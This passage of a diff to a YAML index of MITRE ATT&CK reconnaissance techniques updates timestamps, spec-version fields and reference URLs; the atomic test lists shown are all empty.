       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -61437,8 +62140,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -61460,7 +62161,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -61476,8 +62177,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -61499,7 +62198,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -61515,12 +62214,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -61560,8 +62257,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -61606,11 +62303,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -61650,9 +62346,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -61714,7 +62409,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -61740,7 +62434,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -61761,8 +62455,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -61827,7 +62519,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -61875,7 +62566,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -61897,7 +62587,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -61913,34 +62603,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -61949,15 +62615,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -61979,7 +62668,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -61995,8 +62684,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -62057,29 +62744,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -62088,15 +62756,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -62122,7 +62809,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -62140,47 +62827,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -62189,19 +62839,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -62224,7 +62910,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -62240,8 +62926,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -62267,7 +62951,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -62283,8 +62967,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -62312,7 +62994,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -62328,12 +63010,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -62342,16 +63022,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -62364,8 +63044,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -62376,52 +63056,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -62443,7 +63121,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -62459,8 +63137,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -62486,7 +63162,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -62504,8 +63180,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
